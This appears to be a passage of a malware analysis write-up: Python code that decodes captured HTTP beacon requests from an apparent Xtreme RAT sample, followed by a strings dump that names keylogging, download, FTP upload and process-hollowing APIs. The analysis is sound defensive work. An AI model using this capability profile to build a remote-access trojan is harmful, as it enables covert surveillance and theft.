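    request = parse_http_request(hexdump_to_bytes(DUMP_PORT81))
    print(request["method"], request["path"], "->", request["host"], request["port"])
    print("indicators:", xtreme_indicators(request))
    print("trailing bytes start:", request["trailing"][:24])
```

Feeding the other dumps through the same functions gives the full port list for the no-ip host; the offset check is what makes copy-pasted dumps safe to trust, since a line lost in extraction shows up as an exception rather than as a plausible but wrong request.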

Strings
DVCLAL
PACKAGEINFO
XTREME
%06789:;<&'()*+,-./12345D
 1BSdM
,2003 Avenger by NhT
2!0cZ7
2226K6
"3DU4M
5l3n?n
7U'@~8R
#9Tdt#9
.A7toN
advapi
advapi32.dll
	{AvtX
+BMemory
BSSvY.
(c) 19
c`8R&i&iXDl6&i&i
CharNextW
Config 
CreateTool
DURLDr
	ECk'M
|eJ~aKf5tt
etI>io
ExitProcess
|<f;4C
FtpPutFileW
GecL]do*kh
GetModuleFileNameExW
GetProcAddress
-gT	bk
H32NextW
#iA;Kdt
IE't=\
ipbbrd|
IsWow2
izeofR(ourc
:	j0op
JL8T*T
j#T:#l
 K2PH*
k38O~m
KERNEL32.DLL
Keylogg
<KRBODQ
!K%/V-
KWindow
`lallA
ljnlD0($l
LKBIUW
LoadLibraryA
l(rlen,Wri-
nel32.
NJ$>]P#
npInf.ma0,
~nQ|i;
ntdll.dll
NtUnmapViewOfSection
`O5CGy
oleaut32.dll
pL/P1O
.P%	n*b
PSAPI.dll
q6q4_!e
qPwc-s
q$ Rtrw
raryAGBb5Unl
RegCloseKey
 _r$G2<TtGr$G
rlmonwin
rMod1EndOf"{
rocessDEPw0
RzN&+<{
se0[vN
SHDeleteKeyW
shell32.dll
SHGetMalloc
shlwapi.dll
SnapshotC
SysFreeString
t}$*$7
TeltiByt
This program must be run under Win32
tions Copyrigh
URLDownloadToFileW
urlmon.dll
user32.dll
UV32xw
VirtualAlloc
VirtualFree
VirtualProtect
Vl'qjd7
;']vVL
vYht1dQ
=Wfaj#
WideString
wininet.dll
$WUuDTS
x9	t+M>
XEGHF@A
XPTPSW
-zd6wsO
zf?&-R
]Z}$x.